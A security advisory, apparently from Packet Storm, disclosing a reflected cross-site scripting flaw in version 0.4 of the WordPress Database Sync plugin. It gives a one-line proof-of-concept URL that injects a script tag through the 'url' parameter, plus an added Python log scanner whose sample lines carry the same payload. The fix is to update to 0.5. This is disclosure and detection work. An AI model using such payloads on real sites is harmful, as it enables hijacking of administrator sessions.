WordPress Database Sync 0.4 Cross Site Scripting


WordPress Database Sync plugin version 0.4 suffers from a cross site scripting vulnerability.

Title: WordPress 'Database Sync' Plugin 
Version: 0.4
Author: Morten Nørtoft, Kenneth Jepsen & Mikkel Vej
Download: 
- https://wordpress.org/plugins/database-sync/
- https://plugins.svn.wordpress.org/database-sync/
==========================================================

## Plugin description
==========================================================
Sync databases across servers with a single click.

## Vulnerabilities
==========================================================
The GET parameter 'url' is printed directly to the page without sanitization, making reflected XSS possible.

PoC:
Log in as admin and visit the following URL:
[URL]/wp-admin/tools.php?page=dbs_options&dbs_action=sync&url="><script>alert(1)</script>
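
To check whether requests matching the PoC pattern above have reached a site, the following added example (not part of the original advisory or of the plugin's code) scans access-log text for requests to the dbs_options page whose 'url' parameter decodes to markup characters. The log lines are constructed samples; the Apache combined log format and the function name suspicious_requests are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines in combined format (not real traffic).
SAMPLE_LOG = r'''
203.0.113.5 - - [10/Oct/2016:13:55:36 +0000] "GET /wp-admin/tools.php?page=dbs_options&dbs_action=sync&url=https%3A%2F%2Fstaging.example.org HTTP/1.1" 200 5120
203.0.113.9 - - [10/Oct/2016:13:57:02 +0000] "GET /wp-admin/tools.php?page=dbs_options&dbs_action=sync&url=%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 5301
203.0.113.9 - - [10/Oct/2016:13:58:40 +0000] "GET /wp-admin/tools.php?page=dbs_options&dbs_action=sync&url=\"><script>alert(1)</script> HTTP/1.1" 302 0
198.51.100.7 - - [10/Oct/2016:14:01:11 +0000] "GET /wp-admin/tools.php?page=other_plugin&url=%3Cb%3E HTTP/1.1" 200 900
'''

# The request line is the first quoted field. Apache writes a literal " inside
# it as \", so a plain "[^"]*" pattern would cut the request short.
LINE = re.compile(r'^(\S+) [^"]*"((?:[^"\\]|\\.)*)" (\d{3}) ')
MARKUP = re.compile(r'[<>"\']')  # characters with no place in a sync URL


def suspicious_requests(log_text):
    """Return (client, status, decoded url value) for flagged requests."""
    hits = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        client, request, status = m.groups()
        request = request.replace('\\"', '"')  # undo Apache's quote escaping
        # Drop the method and the trailing protocol token, keep the target.
        target = request.partition(" ")[2].rsplit(" ", 1)[0]
        parts = urlsplit(target)
        if not parts.path.endswith("/wp-admin/tools.php"):
            continue
        query = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes
        if "dbs_options" not in query.get("page", []):
            continue
        for value in query.get("url", []):
            if MARKUP.search(value):
                hits.append((client, int(status), value))
    return hits


if __name__ == "__main__":
    for client, status, value in suspicious_requests(SAMPLE_LOG):
        print(f"{client} status={status} url={value!r}")
```

A 302 status on such a request usually means WordPress redirected an unauthenticated visitor to the login page, so flagged requests answered with 200 are the ones to follow up first.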


## Solution
==========================================================
Update to v.0.5.

==========================================================
Vulnerabilities found using Eir; an early stage static vulnerability scanner for PHP applications.

Source: Packet Storm Security
